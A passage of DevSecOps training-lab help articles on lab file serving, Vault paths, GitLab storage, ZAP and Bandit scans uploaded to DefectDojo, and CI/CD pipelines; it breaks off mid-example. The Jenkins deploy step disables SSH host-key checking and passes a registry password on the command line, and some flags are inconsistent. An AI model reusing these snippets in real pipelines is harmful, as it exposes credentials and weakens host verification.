The Control‑Plane VM often hosts configuration files, logs, or additional tooling. Because it uses a public IP address, you’ll need to retrieve that IP first.

Procedure
1. Open a terminal on the Control‑Plane machine.
2. Launch the HTTP server (same command as above):

       python3 -m http.server 80
3. Obtain the public IP by running:

       curl ifconfig.me

   Example output: 13.215.226.108
4. Navigate to the server from your local browser:

       http://13.215.226.108/
5. Download needed files as you would from any web directory, or use command‑line tools:

       wget http://13.215.226.108/<filename>

Important Considerations
- The server runs on HTTP, not HTTPS, because it is bound to a raw IP address.
- As with the DevSecOps‑Box, shut down the server (Ctrl+C) after you finish downloading to avoid unnecessary exposure.

5. Quick Tips & Best Practices
- Bookmark Frequently Used URLs – Save the /home and /login URLs for each lab machine to avoid typing errors.
- Use a Dedicated Browser Profile – Isolate your exam session from personal browsing to reduce cookie or cache conflicts.
- Document Your Machine IDs – Keep a simple text file with all IDs and IPs; copy‑paste reduces mistakes.
- Test the HTTP Server Before the Exam – Run python3 -m http.server a few minutes early to verify firewall rules and network reachability.
- Monitor Inactivity – Set a timer on your workstation to remind you to stay active if you must step away briefly.
- Know the Reset Policy – If you’re forced to restart a lab, you can usually request a fresh instance from the lab dashboard; the process is automated and takes less than a minute.

Need More Help?

If you encounter a problem that isn’t covered here, reach out to the DevSecOps support team through the Live Chat button in the lab portal, or submit a ticket with the following details:
- Course name and module
- Machine ID(s) involved
- Exact error messages or screenshots
- Timezone and approximate time of the issue

Prompt, detailed information enables the support engineers to resolve your case faster, keeping your learning momentum on track. Good luck, and happy hacking!
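The serve-then-download flow from sections 3 and 4 can be exercised entirely on your own machine with Python's standard library. The sketch below is illustrative only: it serves a temporary directory (standing in for /django-nv) on an ephemeral port rather than port 80, and the file name and contents are invented for the example.

```python
import http.server
import pathlib
import socketserver
import tempfile
import threading
import urllib.request

# Minimal sketch of the lab pattern: `python3 -m http.server` on the remote
# box, then wget/curl from your laptop. Here both ends run locally so the
# round trip can be verified.
def serve_and_fetch(filename: str, content: bytes) -> bytes:
    workdir = tempfile.mkdtemp()
    (pathlib.Path(workdir) / filename).write_bytes(content)

    # Equivalent of running `python3 -m http.server <port>` inside `workdir`.
    def handler(*args, **kwargs):
        return http.server.SimpleHTTPRequestHandler(*args, directory=workdir, **kwargs)

    with socketserver.TCPServer(("127.0.0.1", 0), handler) as srv:
        port = srv.server_address[1]  # port 0 lets the OS pick a free port
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        try:
            # Equivalent of `wget http://<host>/<filename>`.
            with urllib.request.urlopen(f"http://127.0.0.1:{port}/{filename}") as resp:
                return resp.read()
        finally:
            srv.shutdown()  # always stop the server once the download is done

report = serve_and_fetch("zap-output.xml", b"<report/>")
```

The `finally: srv.shutdown()` mirrors the security note above: the server runs unauthenticated, so it should live only as long as the download itself.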

Last updated on Jan 06, 2026

Troubleshooting Common Lab Issues: Keyboard Input, Vault Paths, GitLab SSH Access, and Repository Locations

Learn how to resolve frequent technical challenges you may encounter while working through DevSecOps labs, from typing special characters on a German‑Mac keyboard to locating GitLab repositories on the host machine.

Introduction

Hands‑on labs are an essential part of any DevSecOps training, but they can sometimes be hampered by small technical roadblocks. Learners often ask about:
1. Entering the pipe (|) and bracket characters on a German‑Mac keyboard while using Firefox.
2. Understanding whether Vault paths are fixed or can be customized.
3. Connecting to GitLab‑hosted machines via SSH.
4. Locating the physical directory where a GitLab repository lives on the host system.

This article consolidates clear, step‑by‑step guidance for each of these scenarios, complete with practical examples and best‑practice tips. By the end of the read, you’ll be able to type the required symbols, configure Vault paths confidently, SSH into the correct GitLab nodes, and inspect repository files directly on the host.

1. Typing Pipe (|) and Brackets on a German‑Mac Keyboard in Firefox

Why the Problem Occurs

Mac keyboards with a German layout map many symbols to different key combinations than the US layout. Firefox (and some remote lab consoles) may not interpret the default shortcuts correctly, causing symbols like |, {, } or [ ] to be ignored.

Quick Fix: Switch to the US Keyboard Layout

| Step | Action |
|------|--------|
| 1 | Open System Settings → Keyboard → Input Sources. |
| 2 | Click the + button, select English – U.S., and add it. |
| 3 | Optionally, enable Show input menu in menu bar to toggle quickly. |
| 4 | In Firefox, switch to the U.S. input source (menu bar icon) before typing the symbols. |

Result: All standard US symbols—including |, {, }, [, and ]—work as expected in the lab console.
Alternative: Use Unicode Key Codes (If you cannot change the layout)

With the Unicode Hex Input source enabled in macOS (System Settings → Keyboard → Input Sources), hold Option and type the four‑digit hex code for the symbol:

| Symbol | Unicode hex code (hold Option, then type) |
|--------|-------------------------------------------|
| Pipe (\|) | 007C |
| Left Bracket ([) | 005B |
| Right Bracket (]) | 005D |
| Left Curly Brace ({) | 007B |
| Right Curly Brace (}) | 007D |

Tip: Adding the US layout is the most reliable method for repeated lab work.

2. Defining Custom Paths in HashiCorp Vault

Understanding Vault Paths
- Paths are hierarchical identifiers (e.g., secret/data/myapp/config) that organize secrets, policies, and auth methods.
- They are not hard‑coded; you create them to match your organization’s structure.

Can You Use Any Path?

Yes. You may define any path that complies with Vault’s naming rules:
- Use only alphanumeric characters, hyphens (-), underscores (_), and forward slashes (/).
- Avoid leading or trailing slashes, and keep the path length reasonable (under 255 characters).

Example: Creating a Custom Secrets Path

    # Enable the KV secrets engine at a custom mount point
    vault secrets enable -path=custom-secrets kv

    # Write a secret to a custom sub‑path
    vault kv put custom-secrets/app1/db password=SuperSecret123

    # Read the secret back
    vault kv get custom-secrets/app1/db

Best Practices
- Naming conventions: team/project/environment (e.g., devops/ci-pipeline/prod).
- Access control: Attach policies to the exact path to enforce least‑privilege.
- Documentation: Keep a living diagram of your path hierarchy for onboarding and audits.

3. SSH Access to GitLab Machines

Identifying the Right Host

| Hostname Pattern | What It Represents |
|------------------|--------------------|
| gitlab-ce-<MachineID> | The GitLab Community Edition server (the central GitLab instance). |
| gitlab-runner-<ID> | A GitLab Runner node that executes CI/CD jobs. |

How to SSH In
1. Locate the SSH credentials provided in your lab environment (usually a private key file id_rsa_lab).
2. Add the key to your SSH agent:

       eval "$(ssh-agent -s)"
       ssh-add /path/to/id_rsa_lab
3. Connect using the hostname supplied in the lab instructions:

       ssh <username>@gitlab-ce-12345
       # or for a runner
       ssh <username>@gitlab-runner-3muz998d
4. Verify the connection by checking the GitLab version:

       gitlab-rake gitlab:env:info

Common Pitfalls
- DNS resolution: If the hostname does not resolve, add an entry to your local /etc/hosts file as instructed by the lab.
- Port changes: Some labs expose SSH on a non‑standard port (e.g., 2222). Use ssh -p 2222 user@host.

4. Finding the Physical Location of a GitLab Repository on the Host

How GitLab Stores Repositories

GitLab uses hashed storage by default. Each project is stored under a directory derived from the SHA‑256 hash of the project’s numeric ID, so the on‑disk name never matches the project name you see in the UI.

Typical path pattern:

    /var/opt/gitlab/git-data/repositories/@hashed/<first-two-chars>/<next-two-chars>/<full-hash>.git

Viewing the Repository with the tree Command

    # Navigate to the base storage directory
    cd /var/opt/gitlab/git-data/repositories/@hashed

    # Show the tree for a specific project (replace the segments with your project's hash)
    tree -L 2 <first-two>/<next-two>/<full-hash>.git

Note: The GUI shows a friendly project name, while the filesystem uses the hash, so the directory names will not match the UI directly.

Quick Way to Map a Project to Its Hash
1. Get the project ID from the GitLab UI (Project → Settings → General → Project ID).
2. Run the following Ruby command on the GitLab server (requires admin rights):

       gitlab-rails console -e production
       project = Project.find(<PROJECT_ID>)
       puts project.disk_path  # => the hashed path

Tips for Lab Environments
- Use sudo gitlab-rails runner "puts Project.find_by_path('mygroup/myproject').disk_path" to retrieve the exact path in one line.
- Remember that you need root or gitlab‑rails user permissions to explore the storage directories.
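Because hashed storage is derived from the project ID alone, you can also reconstruct the path without the Rails console. This sketch assumes GitLab's documented scheme (SHA‑256 of the project ID rendered as a string); treat the output as a convenience, and prefer `project.disk_path` when in doubt.

```python
import hashlib

def gitlab_disk_path(project_id: int) -> str:
    """Rebuild a project's hashed-storage path from its numeric ID.

    Follows GitLab's documented layout: the relative path is built from
    the SHA-256 hex digest of the project ID as a string.
    """
    digest = hashlib.sha256(str(project_id).encode()).hexdigest()
    return f"@hashed/{digest[:2]}/{digest[2:4]}/{digest}.git"

path = gitlab_disk_path(1)
```

Prefix the result with /var/opt/gitlab/git-data/repositories/ to get the directory that `tree` inspects above.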
Common Questions & Quick Tips

| Question | Quick Answer |
|----------|--------------|
| Can I keep my German keyboard layout and still type \|? | Yes, use the US layout temporarily or the Unicode entry method. |
| Do Vault paths have to start with secret/? | No. Paths are defined by the mount point you choose (e.g., custom-secrets/). |
| What if SSH to a GitLab host times out? | Verify the hostname, ensure your private key is loaded, and check for custom SSH ports. |
| Why does the repository folder look different from the GitLab UI? | GitLab stores repos using hashed directories for scalability and security; the UI maps these hashes to friendly names. |

Conclusion

Navigating lab environments efficiently requires a blend of keyboard tricks, Vault path flexibility, SSH know‑how, and an understanding of GitLab’s storage architecture. By applying the steps and best practices outlined above, you’ll eliminate common stumbling blocks, focus on the core DevSecOps concepts, and make the most of your hands‑on learning experience. Happy hacking!

Last updated on Jan 26, 2026

Running ZAP Scans and Uploading Results to DefectDojo – A Step‑by‑Step Guide

In this article you’ll learn how to execute an OWASP ZAP scan from the DevSecOps Box, troubleshoot common errors, understand key Docker mount points, and automatically push the scan results to DefectDojo using the provided upload-results.py script. The guide covers four frequent questions that learners encounter while working through the Practical DevSecOps labs, and it includes ready‑to‑copy Jenkins pipeline snippets for continuous‑delivery scenarios.

Table of Contents
1. Prerequisites
2. Scanning the Production Machine with ZAP
   - 2.1 Fixing the “expected File … zap‑output.xml to exist” error
3. Understanding the /zap/wrk mount point
4. Using the --environment flag in upload-results.py
5. Uploading ZAP Results to DefectDojo from Jenkins
   - 5.1 Full Jenkins stage example
6. Tips & Common Questions

Prerequisites

| Requirement | Why It Matters | How to Verify |
|-------------|----------------|---------------|
| GitLab repository cloned on the DevSecOps Box | ZAP writes its output into the repository’s working directory. | Run ls -la in the box; you should see your project folder (e.g., django-nv). |
| Docker (image softwaresecurityproject/zap-stable:2.13.0) | Provides a consistent ZAP environment. | docker version |
| Python 3 with the requests library installed (used by upload-results.py) | Needed for the API call to DefectDojo. | python3 -c "import requests" |
| DefectDojo credentials (DOJO_HOST & DOJO_API_TOKEN) stored in Jenkins or the box | Allows authenticated uploads. | echo $DOJO_HOST / echo $DOJO_API_TOKEN (mask in CI). |

Scanning the Production Machine with ZAP

The lab asks you to run a ZAP baseline scan against the production URL https://prod-fmrtdibo.lab.practical-devsecops.training and store the XML report at /django-nv/zap-output.xml.
Typical command (run from the DevSecOps Box)

    cd /django-nv   # <-- ensure you are inside the cloned repo
    docker run --rm -v $(pwd):/zap/wrk \
      -t softwaresecurityproject/zap-stable:2.13.0 \
      zap-baseline.py -t https://prod-fmrtdibo.lab.practical-devsecops.training \
      -r zap-output.xml

- -v $(pwd):/zap/wrk mounts your current directory into the container at /zap/wrk.
- zap-baseline.py performs a quick, unauthenticated scan and writes zap-output.xml inside the mounted folder.

Fixing the “expected File … zap‑output.xml to exist” error

If you see:

    expected File /django-nv/zap-output.xml to exist

the most common causes are:
1. Repository not cloned – The /django-nv path does not exist on the box. Solution: Clone the GitLab repo first:

       git clone https://gitlab.com/your‑group/django-nv.git /django-nv
2. Wrong working directory – You ran the Docker command from a different folder, so the mount point is empty. Solution: cd /django-nv before executing the Docker run command.
3. Permission issues – The container cannot write to the host directory. Solution: Ensure the directory is owned by your user (chown -R $(whoami) /django-nv) or run Docker with appropriate user flags.

After correcting the above, re‑run the scan. You should now see zap-output.xml inside /django-nv and be able to mark the lab task as complete.

Understanding the /zap/wrk Mount Point

/zap/wrk is not a command; it is the target directory inside the Docker container where the host’s current working directory ($(pwd)) is mounted.

    Host directory (e.g., /django-nv)  →  Docker container path /zap/wrk

Why it matters:
- File persistence – Anything written to /zap/wrk inside the container ends up on the host, allowing you to keep the ZAP report after the container exits.
- Consistency across tools – Many Docker‑based security tools (e.g., Trivy, Grype) follow the same pattern: you must supply a -v $(pwd):/some/path and often a -w /some/path flag so the tool knows where to read/write files.

If you omit the mount, the container writes the report to an ephemeral filesystem that disappears when the container stops, leading to the “file does not exist” error.

Using the --environment Flag in upload-results.py

The script upload-results.py pushes scan artifacts to DefectDojo via its REST API. The --environment argument tells DefectDojo which environment the scan represents (e.g., Development, Staging, Production).

    python3 upload-results.py \
      --host $DOJO_HOST \
      --api-key $DOJO_API_TOKEN \
      --engagement_id 1 \
      --product_id 1 \
      --lead_id 1 \
      --environment "Production" \
      --result_file zap-output.xml \
      --scanner "ZAP Scan"

Benefits:
- Filtering – In DefectDojo you can view findings per environment, making it easy to compare a dev build against production.
- Reporting – Automated dashboards can highlight regressions that only appear in production.
- Audit trail – Knowing the origin environment satisfies compliance requirements.

Uploading ZAP Results to DefectDojo from Jenkins

The lab’s Jenkins exercise asks you to create a new stage called defectdojo that uploads the ZAP XML generated in the previous zap-baseline stage. The key steps are:
1. Copy the artifact from the earlier stage (using the Copy Artifact plugin).
2. Install Python dependencies inside the Jenkins agent.
3. Set the locale to UTF‑8 (prevents character‑encoding errors when the XML contains non‑ASCII symbols).
4. Run upload-results.py with the proper credentials.

Full Jenkins stage example (Declarative Pipeline)

    pipeline {
      agent any
      stages {
        stage('zap-baseline') {
          steps {
            // ... ZAP scan that archives zap-output.xml ...
            archiveArtifacts artifacts: 'zap-output.xml', fingerprint: true
          }
        }
        stage('defectdojo') {
          steps {
            // 1️⃣ Pull the ZAP report from the previous stage
            copyArtifacts filter: 'zap-output.xml',
                          fingerprintArtifacts: true,
                          projectName: 'django.nv',
                          selector: specific(env.BUILD_NUMBER)

            // 2️⃣ Install the Python requests library (runs only if not cached)
            sh 'pip3 install --user requests'

            // 3️⃣ Upload to DefectDojo with a UTF‑8 locale.
            //    Note: LC_ALL must be exported in the same sh step that runs
            //    the script; each sh step spawns a fresh shell, so an export
            //    in a separate step would not carry over.
            withCredentials([
              string(credentialsId: 'dojo-host', variable: 'DOJO_HOST'),
              string(credentialsId: 'dojo-api-token', variable: 'DOJO_API_TOKEN')
            ]) {
              sh '''
                export LC_ALL=C.UTF-8
                python3 upload-results.py \
                  --host $DOJO_HOST \
                  --api-key $DOJO_API_TOKEN \
                  --engagement_id 1 \
                  --product_id 1 \
                  --lead_id 1 \
                  --environment "Production" \
                  --result_file zap-output.xml \
                  --scanner "ZAP Scan"
              '''
            }
          }
        }
      }
      post {
        always {
          cleanWs()
        }
      }
    }

Key points in the script
- LC_ALL=C.UTF-8 – forces the shell to use UTF‑8 encoding, avoiding “UnicodeDecodeError”. It is exported inside the same sh step as the Python call because each sh step runs in its own shell.
- withCredentials – securely injects the DefectDojo host and API token.
- copyArtifacts – transfers zap-output.xml from the zap-baseline stage to the current workspace.

Tips & Common Questions

| Question | Quick Answer |
|----------|--------------|
| Why does the upload fail with “UnicodeDecodeError”? | Add export LC_ALL=C.UTF-8 (or LANG=C.UTF-8) in the same shell step that runs the Python script. |
| Can I use a JSON report instead of XML? | Yes – ZAP can output JSON (-J zap-output.json). Just change --result_file and set --scanner "ZAP JSON". |
| Do I need to run pip install requests on every build? | Not if you cache the virtual environment or use a Docker agent that already includes the library. |
| What if the Jenkins stage still can’t find zap-output.xml? | Verify the artifact name in the archiveArtifacts step of the previous stage and ensure the filter pattern matches exactly. |
| Is the --environment value case‑sensitive? | DefectDojo stores it as a free‑text field, but it’s best to keep the same capitalization across builds for consistent filtering. |

Final Checklist
- [ ] Clone the GitLab repo to /django-nv on the DevSecOps Box.
- [ ] Run the ZAP Docker command from /django-nv.
- [ ] Confirm zap-output.xml exists after the scan.
- [ ] Set the locale to UTF‑8 before invoking upload-results.py.
- [ ] Use Jenkins Copy Artifact and the provided pipeline snippet to push results to DefectDojo.

By following this guide, you’ll be able to execute ZAP scans reliably, troubleshoot the most common pitfalls, and integrate the findings into DefectDojo for centralized vulnerability management. Happy hacking—and keep your pipelines secure!
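upload-results.py is provided by the lab, so its internals are not shown here. As a hedged sketch of what such a script typically sends, the payload below uses field names from DefectDojo's public /api/v2/import-scan/ REST endpoint; the exact set of fields the lab script uses may differ.

```python
# Hypothetical payload builder mirroring DefectDojo's import-scan API.
# Field names follow DefectDojo's documented REST API; the lab's actual
# upload-results.py may compose its request differently.
def build_import_scan_payload(engagement_id: int, environment: str,
                              scan_type: str, report_path: str) -> dict:
    return {
        "engagement": engagement_id,   # which engagement receives the findings
        "environment": environment,    # maps to the --environment flag
        "scan_type": scan_type,        # e.g. "ZAP Scan"
        "active": True,                # import findings as active
        "verified": False,             # leave triage to a human reviewer
        "file": report_path,           # sent as a multipart file upload in practice
    }

payload = build_import_scan_payload(1, "Production", "ZAP Scan", "zap-output.xml")
```

In practice the script would POST this (with the report attached as a multipart file and a `Authorization: Token …` header) to `<host>/api/v2/import-scan/`; consult your DefectDojo instance's API documentation for the authoritative field list.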

Last updated on Jan 06, 2026

Integrating Bandit and Other Security Scans into CI/CD Pipelines (GitLab, Jenkins, GitHub Actions & CircleCI)

Security‑as‑code is a core pillar of DevSecOps. Whether you use GitLab CI, Jenkins, GitHub Actions, or CircleCI, you can run static‑application‑security‑testing (SAST) tools such as Bandit and automatically publish the findings to downstream systems (e.g., DefectDojo). This article walks through the most common pitfalls and shows you reliable patterns for:
1. Running Bandit in a GitLab CI job and preserving the JSON report.
2. Building, testing, releasing, and deploying a Django app with Jenkins while pushing Docker images to a private registry.
3. Executing Bandit in GitHub Actions, handling “job‑failed‑because‑vulnerabilities‑found” scenarios, and uploading results to DefectDojo.
4. Understanding why a failing integration step does not stop other independent jobs in CircleCI.

1. GitLab CI – Keep the Bandit Report Even When the Scan Fails

The problem

When when: on_fail (or when: fail) is used under the docker run step, the job stops on a non‑zero exit code and no artifact is saved. Removing the condition lets the job finish, but the pipeline aborts on the first failure.

The solution – Use when: always and separate the scan from the artifact step

    # .gitlab-ci.yml
    sast:
      image: docker:latest      # optional – you can also use the default runner image
      services:
        - docker:dind           # needed for Docker-in-Docker
      stage: test
      script:
        # 1️⃣ Run Bandit – always succeed (ignore exit code)
        - docker run --rm -v "$(pwd)":/src hysnsec/bandit -r /src -f json -o /src/bandit-output.json || true
      artifacts:
        when: always            # always upload, even if the job is marked failed
        paths:
          - bandit-output.json
        expire_in: 1 week

Key points

| Element | Why it matters |
|---------|----------------|
| docker run … \|\| true | Forces the command to exit with 0 so the job continues. Bandit still returns a non‑zero code when vulnerabilities are found, but we capture the JSON report regardless. |
| artifacts.when: always | Guarantees the JSON file is uploaded even when the job is later marked failed. |
| script vs. separate run steps | In GitLab CI a single script block runs sequentially; you don’t need an extra run step for ls -al unless you want debugging output. |

2. Jenkins – Full CI/CD Flow with Docker Registry & DefectDojo

Below is a declarative pipeline that builds a Django project, runs unit tests, pushes a Docker image to a private GitLab registry, and finally deploys to production after a manual approval.

    pipeline {
      agent any
      environment {
        REGISTRY_URL   = "gitlab-registry-JnOHfNpe.lab.practical-devsecops.training"
        REGISTRY_CREDS = "registry-auth"
      }
      stages {
        stage('Build') {
          agent { docker { image 'python:3.6' args '-u root' } }
          steps {
            sh '''
              python3 -m venv env
              . env/bin/activate
              pip install -r requirements.txt
              python manage.py check
            '''
          }
        }
        stage('Test') {
          agent { docker { image 'python:3.6' args '-u root' } }
          steps {
            sh '''
              . env/bin/activate
              pip install -r requirements.txt
              python manage.py test taskManager
            '''
          }
        }
        stage('Release') {
          steps {
            script {
              def image = docker.build("${REGISTRY_URL}/root/django-nv:${BUILD_NUMBER}")
              docker.withRegistry("https://${REGISTRY_URL}", REGISTRY_CREDS) {
                image.push()
              }
            }
          }
        }
        stage('Integration') {
          steps {
            // Do not fail the whole pipeline – just mark this stage as failed
            catchError(buildResult: 'SUCCESS', stageResult: 'FAILURE') {
              echo "This is an integration step"
              sh 'exit 1'   // simulated failure
            }
          }
        }
        stage('Prod') {
          when { tag "release-*" }
          steps {
            input message: 'Deploy to production?', ok: 'Deploy'
            withCredentials([
              string(credentialsId: 'prod-server', variable: 'DEPLOYMENT_SERVER'),
              string(credentialsId: 'docker_username', variable: 'DOCKER_USERNAME'),
              string(credentialsId: 'docker_password', variable: 'DOCKER_PASSWORD')
            ]) {
              sh """
                ssh -o StrictHostKeyChecking=no root@${DEPLOYMENT_SERVER} '
                  docker login -u ${DOCKER_USERNAME} -p ${DOCKER_PASSWORD} ${REGISTRY_URL}
                  docker rm -f django.nv || true
                  docker pull ${REGISTRY_URL}/root/django-nv:${BUILD_NUMBER}
                  docker run -d --name django.nv -p 8000:8000 ${REGISTRY_URL}/root/django-nv:${BUILD_NUMBER}
                '
              """
            }
          }
        }
      }
      post {
        failure {
          updateGitlabCommitStatus name: env.STAGE_NAME, state: 'failed'
        }
        success {
          updateGitlabCommitStatus name: env.STAGE_NAME, state: 'success'
        }
        always {
          cleanWs(deleteDirs: true, disableDeferredWipeout: true)
        }
      }
    }

Highlights for learners
- catchError – mirrors the GitLab allow_failure pattern; the pipeline continues while the stage is marked red.
- Docker‑in‑Docker – docker.build creates an image locally, then docker.withRegistry pushes it securely using stored credentials.
- Manual approval – input forces a human gate before production deployment.

3. GitHub Actions – Running Bandit, Ignoring Vulnerability‑Induced Failures, and Sending Results to DefectDojo

Why the job fails

Bandit exits with a non‑zero status when it discovers security issues. GitHub Actions treats any non‑zero exit code as a failed step, which stops downstream steps unless you explicitly tell the runner to ignore the error.
Updated workflow snippet

    name: SAST – Bandit Scan
    on:
      push:
        branches: [ main ]

    jobs:
      bandit-scan:
        runs-on: ubuntu-latest
        steps:
          # 1️⃣ Checkout the repo
          - uses: actions/checkout@v2

          # 2️⃣ Run Bandit – continue even if vulnerabilities are found
          - name: Run Bandit
            run: |
              docker run --rm -v "$(pwd)":/src hysnsec/bandit \
                -r /src -f json -o /src/bandit-output.json
            continue-on-error: true   # <-- crucial

          # 3️⃣ Upload the JSON report as an artifact (always run)
          - name: Upload Bandit report
            uses: actions/upload-artifact@v2
            with:
              name: bandit-report
              path: bandit-output.json
            if: always()              # keep the artifact even on failure

          # 4️⃣ Install Python (required by the upload script)
          - name: Set up Python
            uses: actions/setup-python@v2
            with:
              python-version: '3.6'

          # 5️⃣ Push findings to DefectDojo
          - name: Send results to DefectDojo
            run: |
              python upload-results.py \
                --host ${{ secrets.DOJO_HOST }} \
                --api_key ${{ secrets.DOJO_API_TOKEN }} \
                --engagement_id 1 \
                --product_id 1 \
                --lead_id 1 \
                --environment "Production" \
                --result_file bandit-output.json \
                --scanner "Bandit Scan"
            continue-on-error: true   # optional – you may want the pipeline to succeed regardless

Explanation of key directives

| Directive | Purpose |
|-----------|---------|
| continue-on-error: true (step level) | Prevents a non‑zero exit from aborting the job. The step is marked yellow (failed but allowed). |
| if: always() | Guarantees the artifact upload runs even when the previous step is marked failed. |
| setup-python | Required only because the upload script is a Python program; you can replace it with any runtime you need. |

4. CircleCI – Why Independent Jobs Keep Running After a Failure

The observation

In the “integration” job we deliberately run exit 1. The UI shows the job as failed, yet the subsequent “prod” job still executes.

The underlying rule

CircleCI treats each job as an isolated unit of work. A failure in one job does not automatically cancel downstream jobs unless you create an explicit dependency using the requires keyword (or the newer needs syntax).

Example workflow showing the effect

    version: 2.1
    jobs:
      build:
        docker: [{image: python:3.6}]
        steps: [checkout, run: echo "building"]
      integration:
        docker: [{image: python:3.6}]
        steps:
          - run: echo "integration step"
          - run: exit 1   # intentional failure
      prod:
        docker: [{image: python:3.6}]
        steps: [run: echo "deploy to prod"]

    workflows:
      version: 2
      pipeline:
        jobs:
          - build
          - integration:
              requires:
                - build
          - prod:
              requires:
                - integration   # <-- comment this line to make prod independent

- When requires: - integration is present, the prod job will be skipped if integration fails.
- When the requires line is omitted (or you use type: approval for a manual gate), prod runs regardless of the integration outcome.

Takeaway for learners
- Use requires/needs to model true dependencies.
- If you want a “best‑effort” job that should always run (e.g., cleanup, reporting), deliberately omit the dependency or add when: always in GitLab‑style pipelines.

Common Questions & Tips

| Question | Quick Answer |
|----------|--------------|
| How do I keep a job’s artifacts when the scan fails? | In GitLab use artifacts.when: always. In GitHub Actions use if: always() on the upload step and continue-on-error: true on the scan step. |
| Can I make a Jenkins stage “optional” like GitLab’s allow_failure? | Yes – wrap the steps in catchError(buildResult: 'SUCCESS', stageResult: 'FAILURE'). |
| What if I want the pipeline to stop on the first security failure? | Remove continue-on-error / \|\| true and let the tool’s non‑zero exit code propagate. |
| Do I need Docker‑in‑Docker for Bandit in GitLab? | Only when the runner itself isn’t a Docker image that already contains Bandit. Using docker run with the host’s Docker socket (-v /var/run/docker.sock:/var/run/docker.sock) is another option. |
| How do I pass secrets to a Docker container in CI? | Mount them as environment variables (-e VAR=value) or use the CI platform’s secret‑store (GitLab CI variables, Jenkins credentials, GitHub Actions secrets). |

TL;DR Checklist
- GitLab CI – Run Bandit with || true, set artifacts.when: always.
- Jenkins – Use catchError for non‑blocking stages, push Docker images with docker.withRegistry.
- GitHub Actions – Add continue-on-error: true to the Bandit step; always upload the artifact.
- CircleCI – Define explicit job dependencies (requires/needs) if a failure should block downstream jobs.

By applying these patterns, you’ll have reliable security‑testing pipelines that never lose evidence, continue when appropriate, and fail fast when you need a hard stop. Happy securing!
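The `|| true` / continue-on-error pattern used throughout this article reduces to one idea: run the scanner, record its exit code, but don't let that code abort the step. A minimal sketch (the failing command here is a stand-in for a scanner that found issues, not a real Bandit invocation):

```python
import subprocess
import sys

def run_scan_keep_going(cmd):
    """Run a scanner and return its exit code without raising.

    The Python analogue of appending `|| true` in a CI script: the step
    itself always 'succeeds', and the caller decides later whether the
    recorded exit code should fail the build.
    """
    return subprocess.call(cmd)

# Stand-in for a scanner that found vulnerabilities and exits non-zero,
# the way Bandit does.
rc = run_scan_keep_going([sys.executable, "-c", "import sys; sys.exit(1)"])
```

Because the exit code is preserved rather than swallowed, a later pipeline step can still choose a hard stop (e.g., fail the build when `rc != 0` on release branches).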

Last updated on Jan 06, 2026

Hardening Linux and Windows with Ansible in a CI/CD Pipeline

Learn how to integrate security‑hardening playbooks into your CI/CD workflow, understand when builds should fail, and master authentication for both Linux and Windows targets.

Introduction

Automating security hardening is a cornerstone of modern DevSecOps. By using Ansible you can apply consistent, repeatable configurations to Linux and Windows hosts directly from your CI/CD pipeline. This article explains:
- When a pipeline should be marked as failed based on Ansible results.
- Why private keys are (or aren’t) required in lab environments.
- How to manage SSH/WinRM authentication and the role of known_hosts.
- A step‑by‑step example of wiring hardening playbooks into a typical CI/CD job.

Whether you are preparing for a DevSecOps certification or simply want to tighten your production environment, the concepts below will help you build a reliable, secure automation flow.

1. When Should the CI/CD Pipeline Fail?

1.1 Ansible task outcomes

| Outcome | Description | Impact on pipeline |
|---------|-------------|--------------------|
| ok | Task executed successfully, no changes needed. | Build continues. |
| changed | Task applied a change (e.g., updated a permission). | Build continues – change is expected. |
| failed | Task could not complete (e.g., permission denied, missing file). | Pipeline fails if the exit code propagates. |
| skipped | Condition not met (e.g., OS‑specific task on the wrong platform). | Build continues. |
| unreachable | Host could not be contacted (SSH/WinRM error). | Pipeline fails – no way to enforce hardening. |

1.2 How Ansible exit codes affect CI/CD
- Exit code 0 – All tasks completed (including changed). CI/CD treats the job as successful.
- Exit code 2 – At least one task failed. Most CI runners (GitLab, GitHub Actions, Azure Pipelines) mark the step as failed.
- Exit code 1 – Generic error (e.g., syntax error in the playbook). Also fails the job.
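The exit-code rules above are effectively what every CI runner applies to the `ansible-playbook` step. As a sketch:

```python
def ci_job_status(ansible_rc: int) -> str:
    """Map an ansible-playbook exit code to a CI job outcome.

    Mirrors the rules above: 0 means every task ended ok/changed/skipped,
    while any non-zero code (1 = generic error, 2 = failed tasks, plus
    other codes such as unreachable hosts) marks the job failed.
    """
    return "success" if ansible_rc == 0 else "failed"
```

This is why no special CI configuration is needed for failure detection: the runner simply inherits the playbook's exit code, and any path you want to tolerate must be handled inside the playbook (e.g., with ignore_errors).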
Tip: Use ignore_errors: true only for non‑critical hardening steps, and capture the result with register so you can decide later whether to abort the pipeline.

1.3 Practical example

```yaml
- name: Enforce secure file permissions
  file:
    path: /etc/ssh/sshd_config
    mode: '0600'
    owner: root
    group: root
  become: true
  register: perm_result
  failed_when: perm_result is failed
```

If the file module cannot set the mode (perhaps because the file is locked), Ansible returns a non‑zero exit code, causing the CI job to fail automatically.

2. Authentication in Lab vs. Production Environments

2.1 Why labs often omit a private key

- Pre‑provisioned credentials – Lab environments typically expose a default SSH key pair on the build agent, allowing password‑less access to the target VMs.
- Security sandbox – Since the lab is isolated, the risk of key leakage is minimal, so the instructor can skip the step of uploading a personal private key.

Remember: In real projects you should never embed private keys in the repository. Use secret managers (HashiCorp Vault, Azure Key Vault, GitHub Secrets) and inject them at runtime.

2.2 Adding the server’s host key to known_hosts

When you connect to a new host for the first time, SSH performs host key verification. Adding the server’s fingerprint to ~/.ssh/known_hosts (via ssh-keyscan) prevents interactive prompts and protects subsequent connections against man‑in‑the‑middle attacks.

```shell
ssh-keyscan -t rsa devsecops-box-p29i9pmx >> ~/.ssh/known_hosts
```

- The command fetches the RSA host key and appends it to the local trust store.
- After this step, Ansible can run non‑interactive SSH commands safely.

2.3 Windows authentication with WinRM

- Kerberos or NTLM – Most CI runners use a service account with a password stored as a secret.
- Certificate‑based auth – For higher security, configure WinRM to accept client certificates and store the cert in the pipeline’s secret store.

Reference implementations:
- juju4/ansible-harden-windows
- dev-sec/ansible-collection-hardening

3. Integrating Hardening Playbooks into CI/CD

3.1 High‑level workflow

1. Checkout code – Pull the repository containing the hardening playbooks.
2. Prepare credentials – Export the SSH private key or WinRM password from secret storage.
3. Run inventory discovery – Dynamically generate an Ansible inventory (e.g., from Terraform output).
4. Execute the hardening playbook – ansible-playbook -i inventory.yml site.yml.
5. Evaluate the exit code – The CI runner automatically fails the job on non‑zero codes.

3.2 Sample GitHub Actions job

```yaml
name: Hardening CI
on:
  push:
    branches: [ main ]
jobs:
  harden:
    runs-on: ubuntu-latest
    steps:
